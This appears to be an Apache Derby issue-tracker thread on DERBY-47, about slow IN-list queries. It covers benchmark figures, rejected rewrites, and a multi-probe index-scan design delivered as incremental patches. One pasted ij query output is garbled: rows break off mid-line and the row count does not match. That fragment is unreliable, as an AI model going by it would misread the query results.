Literals Literal Markers Marker TempTable ScratchPad ScrSavepoint
ID Count Total ms Avg ms Total ms Avg ms Total ms Avg ms Total ms Avg ms Total ms Avg ms Total ms Avg ms Total ms Avg ms
1 160 160 70 70 40 40 41 41 69841 69841 44261 44261 36699 36699
2 44120 22060 181 90 222124 111062 0 0 8624 4312 6851 3425 6580 3290
3 10958 3652 120 40 12540 4180 10 3 6461 2153 6431 2143 6520 2173
Updated the performance test with 3 join queries, to compare with the 3 nested queries (the joins perform much better).
Note that there is a Wiki page related to this issue:
I'm (finally) preparing to work on this issue. I have a general approach, which is to replace the IN LIST with an IN (sub-query-of-single-column-VirtualTable), but also some open questions.
The basic question is "when" should I replace the IN predicate? The two basic choices would seem to be during preprocessing or during getNextDecoratedPermutation. The former would likely be simpler to implement, but would my force solution to always be used (which, given the poor cost estimates produced due to this bug, might be a good thing). The latter would require replacing the Optimizable against which the IN predicate is being evaluated with a substitute that represents a nested join (probably). I really don't have enough of a grasp of the sub-query optimization to know whether that is a good idea or not..
I assume that the activation object passed to the VTI constructor in VTIResultSet.opencore is where I would get the values for the parameters.
I'm currently looking to add the following if/else branch to InListOperatorNode:
else if ((leftOperand instanceof ColumnReference) &&
rightOperandList.containsAllConstantOrParameterNodes())
Are there possible existing temporary table mechanisms that could be used instead of relying on VTIs?
I would have thought there are existing cases where a temporary table is built during a query execution and used in subsequent joins.
The concern I have over VTIs is type conversion, VTI's return rows as JDBC types, but the input to the IN list is in terms of internal DataValueDescriptors. If the IN list values could be kept as internal types then I think the solution would be easier.
Of course this could be implemented using VTIs and subsequently improved to use an internal table type (language ResultSet implementation), but I wonder if that approach will lead to unnecessary work.
Even if an existing table type is not used, I wonder if it's easier to provide an implementation of Derby's language ResultSet wrapped around a collection of values instead of the JDBC ResultSet doing the same work. Of course with a new language ResultSet there may be more optimization work that one gets for free with a VTI.
language ResultSet = org.apache.derby.iapi.sql.ResultSet
In
DERBY-2152 James wrote:
--------------------
I'm experimenting with transforming a query such as:
SELECT * FROM tableA WHERE columnB IN (constC, ?, ?, constD)
into
SELECT * FROM tableA WHERE columnB IN (SELECT vti.column1 FROM new ArgsToRowsVTI(SomeArgs))
----------------------
Is this an step to solving
DERBY-47, or does re-writing the query this way solve the performance problem?
I'm confused because the new query still uses an IN operator and i don't see any queries like the above as performance experiments (e..g. using another table instead of a vti).
I was thinking (along with the last comment),
I think you have to do the same approach for the parameters, build up a collection of valid parameters, though maybe if you limit your solution you can get away with a range. A range does not work in the general case where a single value in the IN list can be composed of multiple parameters, e.g.
IN (?,?,?, ?+?)
With these approaches the amount of information required to create a ResultSet for such an IN list is fixed and not a factor of the number of values, thus leading to smaller generated code to generate the result set.
Dan wrote:
> Is this an step to solving
DERBY-47, or does re-writing the query this way solve the performance problem?
The goal of the re-write is to avoid the source of
DERBY-47, which is that we don't have a multi-probe index scan, only range index scans, and worse still, when there are parameters involved, the range is the entire index.
My intent is that the re-write will send it towards treating this like an exists; for example:
SELECT * FROM tableA
WHERE EXISTS (SELECT 1 FROM new ArgsToRowsVTI(SomeArgs) AS X(C) WHERE tableA.columnB = X.C)
> I was thinking (along with the last comment), if there was a way to re-write the query
> using something along the lines of a VALUES clause.
> SELECT * FROM tableA TABLE(VALUES constC, ?, ?, constD) AS X(C) where X.C = tableA.columnB = X.C;
I tried a similar approach earlier, and found that it wouldn't compile. Perhaps it was the version of Derby
I was testing with, or perhaps I just screwed up the syntax, but putting parameters into the FROM
clause didn't seem to be allowed.
I'm also concerned about the implications of moving the IN list to the FROM clause. Isn't there a risk of changing the semantics?
Dan wrote:
> ... store it as a saved object.
Thanks for the pointer to CompilerContext.addSavedObject, I'd not come across it before.
Do you think that I could "just" pass InListOperatorNode.rightOperandList (a ValueNodeList) to addSavedObject? If so, then the whole process could be much simpler.
> Do you think that I could "just" pass InListOperatorNode.rightOperandList (a ValueNodeList) to addSavedObject?
No. QueryTreeNodes are for compile time and are assumed to be private to a connection. Any saved objects and the entire compiled plan is shared across multiple connections. Holding onto a node in the compiled plan would lead to memory leaks as the nodes contain references to objects of its connection, which could not be gc'ed once the connection is closed if a compiled plan still had references to the nodes.
I think I've found the code that caused a problem for me when I tried using VALUES to construct a table using parameters.
SubqueryNode.bindExpression contains the following:
/* reject ? parameters in the select list of subqueries */
resultSet.rejectParameters();
The syntax I'd used involved replacing an IN list with an IN sub-query, and clearly that would run into the above code.
So, any idea why that code is there?
I've changed InListOperatorNode.preprocess to replace the node with a new SubqueryNode
in the case where the list is all parameter markers. I'll attach the changed file.
To make the SubqueryNode ready for use I need to call bindExpression and preprocess,
and this is failing in bindExpression because it is attempting to rebind the leftOperand
(a ColumnReference) when I don't have the full context of the original binding.
I would seem to have a few choices:
1) Modify ColumnReference.bindExpression so that it doesn't detects the rebinding
situation, and returns without doing anything. I don't know if there are cases where
rebinding occurs currently, and is supposed to change the binding. Besides that
uncertainty, this seems like a good choice.
2) Modify SubqueryNode.bindExpression to detect when the leftOperand is a
ColumnReference that is already bound, and skip the leftOperand.bindExpression call.
3) Copy much of the code from SubqueryNode.bindExpression into
InListOperatorNode.preprocess, allowing me to bypass the call to
leftOperand.bindExpression. Definitely ugly, hard to maintain.
4) Create a trivial ColumnReference subclass that has an empty bindExpression
implementation, and "clone" the InListOperatorNode.leftOperand as an instance
of this subclass for use as the SubqueryNode.leftOperand , thus avoiding the
problem.
Any thoughts on the preferred approach?
Added code for replacing the InListOperatorNode with a SubqueryNode (IN_SUBQUERY) in the case where all of the list entries are parameter markers. Not yet working (fails in SubqueryNode.bindExpression, calling leftOperand.bindExpression).
I've been thinking more about the suggestion of using a table constructor.
I was concerned about several issues:
1) When I tried it previously I got this error:
ERROR 42Y10: A table constructor that is not in an INSERT
statement has all ? parameters in one of its columns. For
each column, at least one of the rows must have a non-parameter.
Working around this will require figuring out the type of the parameters,
and creating a dummy value to include in the table, with extra code to
remove it.
2) Re-writing the query by adding the table constructor to the fromList
of the SelectNode that includes the IN list predicate potentially
changes the semantics of the query (for example, imagine the case
where the IN list is OR'd with other predicates). This is why I've been
sticking with a sub-query (which my performance experiments indicated
can perform well).
I tried the table constructor again this morning, coming up with a query
re-write that combines the suggested table constructor with an IN sub-query.
For example, we would transform:
SELECT * FROM tableA
WHERE columnB IN (constC, ?, ?, constD)
into:
SELECT * FROM tableA
WHERE columnB IN (
SELECT v FROM TABLE(
VALUES (dummyValue, 0), (constC, 1), (?, 1), (?, 1), (constD, 1)) AS X(v, k) WHERE k=1)
The sub-query is built up as a tree (really a list) of UNIONs, union-ing together each
row in the VALUES clause.
Unfortunately the performance of this is poor, with a table scan of tableA being performed,
rather than using the index on columnB. I'm investigating why this isn't transformed
into a nested loop join, with the UNION on the outside.
As stated in my previous comment, I've been debugging the compilation of this query:
SELECT * FROM tableA
WHERE columnB IN (
SELECT v FROM TABLE(
VALUES (dummyValue, 0), (constC, 1), (?, 1), (?, 1), (constD, 1)) AS X(v, k) WHERE k=1)
The IN operator is represented with a SubqueryNode of type IN_SUBQUERY.
SubqueryNode.preprocess "tries" to flatten this, but because the rightOperand
is doesn't select from a single base table, it decides not to flatten the sub-query
(i.e. it doesn't hoist it up into its parent query).
As a result, the optimizer isn't presented with a join that it can choose the order of,
but rather just one top-level optimizable, with a sub-query that must be optimized
"separately".
Some success at last...
I forced SubqueryNode.preprocess to flatten the sub-query mentioned
previously by modifying SubqueryNode.singleFromBaseTable to return
true (not a valid change, but it helps with this experiment), which then
enabled the optimizer to re-order the join so that the index on tableA
is used. Yeah!
The performance was quite reasonable.
Possible next steps:
- Consider wrapping the sub-query's SelectNode in a MaterializeResultSetNode (helpful in those cases where the sub-query is invariant, and the sub-query ends up being executed multiple times... that latter is not really known until later in the optimization process)
- Modify SubqueryNode.preprocess so that it can flatten more sub-queries (including the one produced above). Materializing the sub-query could help with the flattening.
- Modify InListOperatorNode.preprocess to produce a sub-query like the one above.
I've spent some time looking at this issue and have come up with a solution that is based on two earlier comments for this issue. Namely:
Comment #1:
> I was thinking solution I've come up with does in fact rewrite IN-list queries to create a join between the target table and "something along the lines of a VALUES clause". That said, though, a VALUES expression in Derby is internally parsed into a chain of nested UNIONs between RowResultSetNodes. I did a quick prototype to duplicate that behavior and found that for IN lists with thousands of values in them, a chain of UNIONs is not acceptable. More specifically, I found that such a chain inevitably leads to stack overflow because of recursion in preprocessing and/or optimization. And even if the list is small enough to avoid stack overflow, the time it takes to optimize a UNION chain with, say, a thousand values is far too long (I was seeing optimization times of over 20 seconds with 1000 IN-list values). And lastly, assuming that we were able to code around stack overflow and optimization time, the limit to the size of a UNION chain that Derby can successfully generate is far less than the current limit on IN-lists-
see -which means we would have to skip the rewrite when the list has more than xxx values. That's doable, but not pretty. DERBY-1315 for the details
So in my proposed solution we do not actually create a normal VALUEs expression. Instead we create a new type of node called an "InListResultSetNode" that is specifically designed to handle potentially large lists of constant and/or parameter values. Then we create a new equality predicate to join the InListRSN with the appropriate table, and since InListResultSetNode is an instance of Optimizable, the optimizer can then use the predicate to optimize the join.
Note that I also made changes to the optimizer so that it recognizes InListResultSetNodes as "fixed outer tables", meaning that they are prepended to the join order and remain fixed at their prepended positions throughout the optimization process. This ensures that the optimizer does not have to deal with additional join orders as a result of the IN-list rewrite (it already looks at too many; see DERBY-1907).
Comment
In the solution I've written we do in fact create a "collection of literal values (DataValueDescriptors) at compile time and store it". We do not, however, use saved objects to store/retrieve them. Instead, we use existing code in InListOperatorNode to create an execution time array of DataValueDescriptors and we pass that array to a new execution time result set, InListResultSet, that returns the list of values as a single-column result set. This approach works for both constants and parameters.
By re-using the existing InListOperator code generation we ensure that the max size of an IN-list after these changes will be the same as what it was before these changes.
All of that said, the internal addition of a new InListResultSetNode to a FromList is not without its side effects. The following are the three areas in which I've noticed an unintended change in behavior caused by adding an InListRSN to a FromList. I have a "progress-not-perfection" workaround for the first issue; I still need to investigate the latter two (any input from others would of course be much appreciated).
1) Derby has internal restrictions on the types of queries that it can flatten. Most notably (and as James Synge also noted) a subquery cannot be flattened if its FromList contains more than a single FromTable. When rewriting the IN-list operator as described above, we add the new inListRSN to the appropriate FromList. That means that the FromList will now have more than one FromTable and thus the subquery is no longer flattenable. So for the following query:
select * from t2, (select * from t1 where i in (1, 2, 3)) x
the inner select is currently flattened during preprocessing. With the changes as I've described them, though, the IN list for the subquery would become an InListResultSetNode that is added to the inner FromList, thus rendering the inner query non-flattenable. In the interest of making progress (instead of perfection) on this issue, I simply added logic to skip rewriting an IN-list if appears in a subquery. In that case we will default to normal IN-list processing as it is today.
2) I just discovered this morning that the addition of an InListResultSet to the FromList causes all of the SUR (scrollable updatable result set) tests that use an IN-clause to fail--apparently the presence of the InListResultSet results in a downgrade of the cursor scrollability to "CONCUR_READ_ONLY". I do not yet know why this is the case, nor do I know how to prevent it.
3) The store/readlocks.sql test fails with the proposed changes because of missing ROW locks. I do not know if these missing locks are a problem or just a side effect that can be "fixed" with a master update. More investigation required...
There were of course other tests that failed with row orderings and/or different plans, but so far as I can tell all of those are expected and correct--so I will just update the master files as needed.
For now I have just attached an initial version of the engine changes, d47_engine_doNotCommit_v1.patch, for general review/comments if anyone has any. I plan to look into the above issues more and will probably go to derby-dev with questions where needed. In the meantime, any feedback on the general approach as outlined above would be appreciated.
Oh, and by the way: I ran Derby47PerformanceTest.java (as attached to this issue) with 100,000 rows after applying this patch. Whereas the "Markers" strategy was by far the worse query before my changes, it ends up being the best strategy after my changes, beating out the "Marker" and "JoinTemp" strategies (which were previously the best) by roughly 30 and 25 percent, respectively.
Accidentally attached the _v1 files without granting license to ASF. So I'm reattaching with the correct "Attachment license" option.
Attaching the diff seen with store/readlocks.sql when d47_engine_doNotCommit_v1.patch is applied. This is the actual diff produced from the test; I'll try to post a modified diff that includes the relevant queries tomorrow, to (hopefully) aid in the determination of whether or not this diff is acceptable...
Attaching another readlocks diff, this time with more context so that the queries in question can be seen...
In one of my previous comments I mentioned that d47_engine_doNOTCommit_v1.patch has a problem where the addition of an InListResultSet to the FromList causes all of the SUR (Scrollable Updatable Result set) tests that use an IN-clause to fail. More specifically, the presence of the InListResultSet causes Derby to downgrade the cursor scrollability to "CONCUR_READ_ONLY".
I was eventually able to track down the cause of this behavior: whether or not Derby downgrades a result set to CONCUR_READ_ONLY depends on the value returned by the execution time result set in the "isForUpdate()" method. The default (as defined in NoPutResultSetImpl) is to return false.
In the case of the SUR tests (prior to my changes) we were getting a ScrollInsensitiveResultSet on top of a TableScanResultSet. The former gets its "isForUpdate()" value from the latter, and the latter correctly returns "true" to indicate that the result set is for update and thus no downgrade is needed. With d47_engine_doNotCommit_v1.patch applied, though, we add an InListResultSet to the FromList, which ultimately gives us a JoinResultSet at execution time. The JoinResultSet class does not define an "isForUpdate()" method, so we just return the default--which is "false". That causes the cursor concurrency to be downgraded to CONCUR_READ_ONLY.
To see what would happen I forced JoinResultSet to return "true" and then there was an ASSERT failure because JoinResultSets are not expected to be used for update/delete. The relevant code is in execute/JoinResultSet.java; in the "getRowLocation()" method we see the following comment:
- A join is combining rows from two sources, so it has no
- single row location to return; just return a null.
My guess is that, since the decision to disallow update/delete on a JoinResultSet was intentional, trying to code around that restriction is a bad idea. Or at the very least, it would require a lot more investigation and/or work.
Instead of pursuing that potentially treacherous path, I was able to come up with some logic that checks to see if a result set is updatable at compile time and, if so, to skip the IN-list rewrite. Early testing suggests that this is viable solution.
HOWEVER, as the list of "exceptions" to the IN-list (_v1.patch) rewrite grew, I started to wonder if there wasn't some other solution to
DERBY-47 that would accomplish the same thing, minus all of the exception cases.
A few days later I came across some queries involving multiple IN-list predicates for a single SELECT statement. It turns out that many of those queries return incorrect results (duplicate rows) and/or run much more slowly with the _v1 patch than without.
The fact that there are so many "exceptions to the rule" combined with the undesirable behavior in the face of multiple IN-lists prompted me to abandon my initial idea of internally adding an InListResultSetNode to the user's FROM list (d47_engine_doNOTCommit_v1.patch).
Instead I have been working on an alternate approach to the problem. This second approach, like the first, is based on a comment made by someone else on this issue. This time, though, the comment in question is from James Synge and is as follows:
> The goal of the re-write is to avoid the source of
DERBY-47,
> which is that we don't have a multi-probe index scan, only
> range index scans, and worse still, when there are parameters
> involved, the range is the entire index.
In short, I decided to work with the execution-time result sets to see if it is possible to enforce some kind of "multi-probing" for indexes. That is to say, instead of scanning a range of values on the index, we want to make it so that Derby probes the index N times, where N is the size of the IN-list. For each probe, then, we'll get all rows for which the target column's value equals the N-th value in the IN-list.
Effectively, this comes down to the "Marker" strategy in Derby47Performance.java, where we evaluate an equality predicate, "column = ?", N times. Except of course that, unlike with the Marker strategy, we do the N evaluations internally instead of making the user do it.
A high-level description of how this approach will work is as follows:
- If any value in the IN-list is not a constant AND is not a parameter,
then do processing as usual (no optimizations, no rewrite). Notice
that with this approach we do still perform the optimization if
IN-list values are parameters. That is not the case for the current
Derby rewrite (i.e. without any changes for
DERBY-47).
Otherwise:
- During preprocessing, replace the IN-list with an equality predicate of
the form "column = ?". I.e. the right operand will be a parameter node,
the left operand will be whatever column reference belongs to the IN-list
(hereafter referred to as the "target column"). We call this new, internal
predicate an IN-list "probe predicate" because it will be the basis of
the multi-probing logic at execution time.
- During costing, the equality predicate "column = ?" will be treated as
a start/stop key by normal optimizer processing (no changes necessary).
If the predicate is deemed a start/stop key for the first column in
an index, then we'll multiply the estimated cost of "column = ?" by
the size of the IN-list, to account for the fact that we're actually
evaluating the predicate N times (not just once).
If the predicate is not a start/stop key for the first column in
the index, then we do not adjust the cost. See below for why.
- After we have found the best plan (including a best conglomerate choice),
check to see if the IN-list probe predicate is a start/stop key on the
first column in the chosen conglomerate. In order for that to be the
case the conglomerate must be an index (because we don't have start/stop
keys on table conglomerates). If the probe predicate is not a
start/stop key for the first column in the index, then we "revert" the probe
predicate back to its original IN-list form and evaluate it as a "normal"
InListOperatorNode. In this way we are effectively "giving up" on the multi-
probing approach. This is why we don't change the cost for such probe
predicates (mentioned above).
If the probe predicate is a start/stop key on the first column in
the index conglomerate, then leave it as it is.
- When it comes time to generate the byte code, look to see if we have
a probe predicate that is a start/stop key on the first column in the
chosen conglomerate. If so, generate an array of DataValueDescriptors
to hold the values from the corresponding IN-list and pass that array
to the underlying execution-time result set (i.e. to TableScanResultSet).
Then generate the probe predicate as a "normal" start/stop key for the
scan. This will serve as a "place-holder" for the IN-list values
at execution time.
- Finally, at execution time, instead of using a single start key and a
single stop key to define a scan range, we iterate through the IN-list
values and for each non-duplicate value V[i] (0 <= i < N) we treat V[i]
as both a start key and a stop key. Or put another way, we plug
V[i] into the "column = ?" predicate and retrieve all matching rows.
In this way we are "probing" the index for all rows having value V[i]
in the target column. Once all rows matching V[i] have been returned,
we then grab the next IN-list value, V[i+1], and we reposition the
scan (by calling "reopenCore()"), this time using V[i+1] as the start
and stop key (i.e. plugging V[i+1] into "column = ?"). This will
return all rows having value V[1+1] in the target column.
Continue this process until all values in the IN-list have been
exhausted. When we reach that point, we are done.
As a simple example, assume our query is of the form:
select ... from admin.changes where id in (1, 20000)
During preprocessing we will effectively change this to be:
select ... from admin.changes where id = ?
where "id = ?" is our IN-list "probe predicate". Note that we must make sure the optimizer recognizes "id = ?" as a disguised IN-list operator, as opposed to a true relational operator. The reason is that, while we do treat the probe predicate as a "fake" relational operator so that it can be seen as a start/stop key for the relevant indexes, there are many operations (ex. transitive closure) that should not be done on a probe predicate. So we have to be able to distinguish a probe predicate from other relational predicates.
With the probe predicate in place the optimizer will determine that it is a start/stop key for any index having column "ID" as the first column, and thus the optimizer is more likely to choose one of those indexes over a table scan. If we assume the optimizer decides to use an index on ID for the query, then we'll generate the IN-list values (1, 20000) and we will pass them to the underlying index scan. We'll then generate the probe predicate "column = ?" as a start and stop key for the scan.
At execution, then, the scan will first open up the index by using "1" as the start and stop key for the scan (or put another way, by plugging "1" into the probe predicate, "column = ?"). That will return all rows having ID equal to "1". Then when that scan ends, we'll reopen the scan a second time, this time using "20000" as the start and stop key, therefore returning all the 20000's. Meanwhile, all result sets higher up in the result set tree will just see a stream of rows from the index where ID only equals 1 or 20000.
This works for IN-lists with parameters, as well, because by the time execution starts we know what values the parameters hold.
The first draft of code for implementing all of this is pretty much done, but I plan to post it in increments for ease of review. If all goes well, nothing should change functionally until the final patch, which will be the preprocessing patch that does the actual creation of the "probe predicate". At that point all of the machinery should be in place to recognize the probe predicate and function accordingly.
I ran Derby47PerformanceTest with this "multi-probing" approach and the numbers were similar to what I saw with the _v1 approach (more details coming later). Unlike the _v1 approach, though, the multi-probing approach works with subqueries, left outer joins, and scrollable updatable result sets. In addition, all of the test queries that I came up with involving multiple IN-lists run correctly with the multi-probing approach, and in many cases run quite a bit more quickly--neither of which was true for the _v1 approach. And yes, I do hope to add those test cases to the nightlies as part of my work on this issue.
Incremental patches are forthcoming. In the meantime, if anyone has any comments/suggestions on the approach outlined above, I would appreciated the feedback...
Posting d47_mp_relOpPredCheck_v1.patch, which is the first patch for the multi-probing ("mp") approach described in my previous comment. As mentioned in that comment, we need to be able to distinguish between "true" relational predicates and "probe predicates" so that we do not incorrectly perform certain operations on probe predicates. This first patch adds the logic to allow such distinction. In particular it:
- Adds a new method, "isRelationalOpPredicate()", to Predicate.java that
only returns true if the predicate is a "true" relational predicate; i.e.
it will return "false" for probe predicates.
- Updates several "if" statements in Predicate.java and PredicateList.java
to use the new method.
- Updates several utility methods in BinaryRelationalOperatorNode to distinguish
"true" relational operators from ones that are created internally for probe
predicates.
There should be no functional changes to Derby as a result of this patch, but just to make sure I ran derbyall and suites.All on Red Hat Linux with ibm142. The only failure was a known issue (
DERBY-2348).
This is a pretty small patch so unless I hear otherwise I plan to commit it tomorrow (Friday Feb 23, PST).
Army, this sounds like great progress, thanks.. This is of course something which all DBMS's have to take care with, and I think Derby was already correct in this area (I vaguely recall reading that somewhere).
Performance may benefit from sorting the parameter values during execution, prior to the probing (e.g. if the index is large, and the number of parameters is also large). This sorting is done during compilation for literals.
Thank you very much for feedback, James.
>.
That's an excellent question; thank you for bringing it up. The best thing I could do to answer it was to try it out with the code in my local codeline. Does this example adequately reflect the scenario you are talking about? And are these the results you would expect? I think the answer to both of those questions is "Yes" but I just want to be safe.
Here' s what I did in my local codeline. Note that lines beginning with "
=" are debug lines that I have in my codeline to indicate that we are in fact doing "multi-probing" with x number of IN-list values.
create table t (inew int, iold int);
insert into t (iold) values 2, 1, -1, 0;
insert into t (iold) values 2, 1, -1, 0;
insert into t (iold) values 2, 1, -1, 0;
insert into t (iold) values 2, 1, -1, 0;
update t set inew = iold;
create index t_ix1 on t(inew);
ij> select * from t order by iold;
INEW |IOLD
-----------------------
-1 |-1
-1 |-1
-1 |-1
-1 |-1
0 |0
0 |0
0 |0
0 |0
1 |1
1 |1
1 |1
1
1 |0
1 |0
1 |0
1 |0
0 |1
0 |1
0 |1
0
0 |0
0 |0
0 |0
0 |0
1 |1
1 |1
1 |1
1 |1
2 |2
2 |2
2 |2
2 |2
16 rows selected
I believe that is the correct behavior, esp. since that's what I see in a clean codeline, as well.
> Performance may benefit from sorting the parameter values during execution, prior to the probing .
Yes, my changes include an execution time sort of the IN-list values (on the condition that the sort was not done during compilation). I have to admit, though, that I didn't make that decision for performance reasons; rather, I chose to sort the IN-list values to make it easier to detect (and skip over) duplicates in the IN-list...
I greatly appreciate your feedback on this and hope you will continue ask any questions you might have. The more eyes, the better...
The multiple probe approach always seemed the most natural to me - as the multiple probe support was already there
and used by the execution engine (for different reasons) already. It is great that it looks like you have found an elegant way
to get the optimizer to cost the approach and throw out cases that approach does not support. Part of that was that I understand the mechanics of the multiple probe and didn't understand the semantics of the query rewrite.
Can you say something
why you chose to use x = ? predicate with special flag vs. just having a new multiple-probe inlist predicate (this question
may not make sense - I am talking from the outside of your description not from knowledge of internals).
Also what happens to a query that is effectively an IN list that is hand written using OR's instead (ie, where i = 1 or i = 2 or ...).
Is that already changed to an IN list before we get to your new code here?
This is probably food for a different discussion, but I was wondering about the costing. What is the costing % number of
rows for a where IN
(ie. a parameter at compile time vs a constant, in a non-unique index)? Is this just the cardinality
statistic if it exists? What is the default without the statistic? Where I am going is that it probably does not make sense
to have the estimate of the sum of terms be larger than the number of rows in the db. And just want to understand how many
terms will it take before we give up on the multiple probe.
Army, yes that's the behavior I was hoping to see. Thanks for double checking.
Thank you very much for your excellent questions, Mike. My attempted answers are below...
> Can you say something why you chose to use x = ? predicate with special flag vs. just having a new
> multiple-probe inlist predicate
Good question. I guess the short answer is simply: code reuse. All of the optimization, modification, generation, and execution-time logic for a single-sided predicate is already written and has (presumably) been working for years. Among other things this includes the notion of "start/stop" keys to (re-)position an index scan, which is ultimately what we want and is something that store already knows about. By using a flag we can slightly alter the behavior at key points of certain methods and then, for everything else, we just let Derby do what it already knows how to do. Minimal code changes are required and if something breaks, odds are that it is in the "slightly altered" behavior (or lack thereof), of which there is far less than "everything else".
If anyone knows of how we could improve/simplify the logic and/or performance by creating a new multi-probe predicate then I am certainly open to investigating that path further. But for now it seemed like the creation of "x = ?" with a flag was the simplest and quickest way to go, and it seems to provide the desired results. So that's where I ended up...
> Also what happens to a query that is effectively an IN list that is hand written using OR's instead
> (ie, where i = 1 or i = 2 or ...). Is that already changed to an IN list before we get to your new
> code here?
Yes, transformation of ORs into IN-lists occurs during preprocessing of the OR list. In OrNode.preprocess() there is logic to recognize if an OR list is transformable into an IN-list and, if so, the IN-list is created and then the "preprocess()" method of the IN-list is called. Since the creation of "probe predicates" occurs as part of IN-list preprocessing, this means that Yes, ORs are already converted to an IN-list before my new code takes effect.
As a side note, if there is an OR clause which itself has an IN-list as one of its operands then OrNode preprocessing will, with my proposed changes, combine the existing IN-list with the newly-created IN-list. For example:
select i, c from t1 where i in (1, 3, 5, 6) or i = 2 or i = 4
will be changed to:
select i, c from t1 where i in (1, 3, 5, 6, 2, 4)
This conversion will happen as part of OrNode.preprocess(), as well.
> What is the costing % number of rows for a where IN
(ie. a parameter at compile time vs a
> constant, in a non-unique index)? Is this just the cardinality statistic if it exists?
Generally speaking the way costing for a base table conglomerate works is that we figure out how many rows there are in the table before any predicates are applied. Then, if we have a start/stop predicate and we have statistics, we will calculate a percentage of the rows expected (called "start/stop selectivity") based on the statistics. This ultimately brings us to the "selectivity(Object[]) method of StatisticsImpl, where there is the following code:
if (numRows == 0.0)
return 0.1;
return (double)(1/(double)numUnique);
I.e. the selectivity is 1 over the number of unique values in the conglomerate. Is this what you mean by "just the cardinality statistic if it exists?"
In any event we then multiply that percentage by the estimated row count to get a final estimated row count (I'm leaving out lots of "magic" costing operations here to keep things simple (and because I don't really understand all of that magic myself...)).
> What is the default without the statistic?
If we do not have statistics for a specific conglomerate then we will simply default the start/stop selectivity to 1.0, i.e. the row count will not be adjusted (at least not as relates to this discussion).
> Where I am going is that it probably does not make sense to have the estimate of the sum of terms
> be larger than the number of rows in the db.
Yes, you're absolutely right. This actually occurred to me yesterday, which is why I was poking around the stats code and thus was able to answer your previous question
I agree that the estimated row count should not exceed the total number of rows. I think we could just account for this by adding an explicit check to see if rowCount * sizeOfInList yields a number larger than the number of rows in the conglomerate. If so then we set it to the number of rows in the conglomerate and that's that.
> And just want to understand how many terms will it take before we give up on the multiple probe.
Another great question. The answer is that we do not ever give up on multi-probing as part of "costing" per se. Rather, we calculate a cost and then we compare that cost with all of the other costs found so far; if it's cheaper we use it, otherwise we discard it. Note that "cheaper" here encapsulates a lot of other logic and optimizer info that is far beyond the scope of this discussion.
So in the context of row counts, if the number of IN-list predicates multiplied by the estimated row count (after stat selectivity is applied) yields a high precentage row count (ex. all rows in the table) then the odds of the optimizer choosing to use that particular index are lower. It may still choose to use the index, in which case multi-probing will take effect, but it probably will not (it all depends). Thus the point at which we give up on multi-probing is a factor of how unique the column values are and how many values are in the IN-list. If you're just looking at the size of IN-list, then smaller lists are more likely to result in IN-list probing than larger ones--which I think is what we would expect.
That's a bit of a vague answer but so much of it depends on the query and the data in question that I wouldn't want to say anything more specific than that...
Committed d47_relOpPredCheck_v1.patch with svn 512079 after getting the okay from Mike to do so (on derby-dev):
Attaching the second incremental patch, d47_mp_CBO_MoAP_v1.patch, which updates the logic for cost-based optimization (CBO) and modification of access paths (MoAP) to recognize IN-list "probe predicates" and to handle them appropriately. More specifically this patch adds code to do the following:
- During costing, recognize when we're using a probe predicate as a start/stop key
and adjust the cost accordingly. This means multiplying the estimated cost and
row count for "column = ?" by the number of values in the IN-list (because we are
effectively going to evaluate "column = ?" N times, where N is the size of the
IN-list, and we could return one or more rows for each of the N evaluations).
As mentioned in Mike's comment above, we also want to make sure that the resultant
row count estimate is not greater than the total number of rows in the table.
- When determining which predicates can be used as start/stop keys for the current
conglomerate, only consider a probe predicate to be a start/stop key if it applies
to the first column in the conglomerate. Otherwise the probe predicate would
end up being generated as a store qualifier, which means we would only get rows
for which "column = ?" was true when the parameter was set to the first value
in the IN-list. That means we would end up with incorrect results (missing
rows).
- If cost-based optimization is complete and we are modifying access paths in
preparation for code generation, then take any probe predicates that are not
going to be used as start/stop keys for the chosen conglomerate and "revert" them
back to their original IN-list form (i.e. to the InListOperatorNodes from which
they were built). Those InListOpNodes will then be generated as normal IN-list
restrictions on the rows returned from store. If we did not do this reverting
then the predicates would ultimately be ignored (since they are not valid
qualifiers) and we would therefore end up with incorrect results (extra rows).
- If we're modifying access paths and we have chosen to do multi-probing of an index
then we disable bulk fetching for the target base table. Logically this is not a
requirement. However, it turns out that bulk fetch can lead to poor performance
when multi-probing an index if the number of probe values is high (several hundred
or more) BUT that number is still just a small fraction of the total number of rows
in the table. An example of such a scenario is found in the Derby47PerformanceTest
program attached to this issue. If the total number of rows in the ADMIN.CHANGES
table is 100,000 and there are 200 or more parameter markers in the IN-list, the
performance of multi-probing with bulk fetch enabled is just as bad as a table
scan--and actually gets worse as the number of parameters grows.
I cannot say with any certainty why bulk fetching performs so badly in this situation. My guess (and it's just a guess) is that when we bulk fetch we end up reading a unnecessary pages from disk. My (perhaps faulty) thinking is that for each probe we do of the index our start and stop keys are going to be the same value. That means that we are probably going to be returning at most a handful of rows (more likely just a row or two). But perhaps bulk fetching is somehow causing us to read more pages from disk than we need and the result is a slowdown in performance?
Does anyone know if that actually makes any sense? I could be completely wrong here so I'd appreciate any correction.
All of that said, I found that if I disable bulk fetch for multi-probing the performance returns to what I would expect (matching and even beating the "Marker" strategy posted by James), so that's what d47_mp_CBO_MoAP_v1.patch does. At the very least I'm hoping this is an acceptable step in the right direction.
As with my previous patch, this CBO_MoAP patch should not change any existing functionality because all of the new behavior depends on the existence of "probe predicates", which do not yet exist.
Review comments are much appreciated (esp. w.r.t the bulk fetching changes)...
Attaching a patch, d47_mp_addlTestCases.patch, which adds some additional IN-list test cases to the lang/inbetween.sql test. These test cases all currently behave correctly; by adding them to inbetween.sql we can ensure that they will continue to behave correctly once the
DERBY-47 changes have been completed.
The underlying notion here is to make sure IN list behavior is correct when the left operand is a column reference that is a leading column in one or more indexes. The
DERBY-47 changes will ultimately make it so that most of the new test cases result in an index-probing execution plan, thus we want to make sure that we're testing as many of the various index-based use cases as possible.
Note that these test cases are just testing correctness of results; additional tests will be added later to verify that indexes are in fact being chosen as a result of the
DERBY-47 changes.
Patch committed with svn #512534:
Something about this SQL statement just tickled my fancy and made me smile!
update bt1 set de = cast (i/2.8 as decimal(4,1)) where i >= 10 and 2 * (cast (i as double) / 2.0) - (i / 2) = i / 2;
Committed d47_mp_CBO_MoAP_v1.patch with svn 513839:
URL:
Attaching d47_mp_codeGen_v1.patch, which updates Derby code generation to account for the potential presence of IN-list probe predicates. This patch does the following:
1 - Moves the code for generating a list of IN values into a new method, InListOperatorNode.generateListAsArray()". The new method is then called from two places:
A. InListOperatorNode.generateExpression(): the "normal" code-path for
generating IN-list bytecode (prior to
DERBY-47 changes).
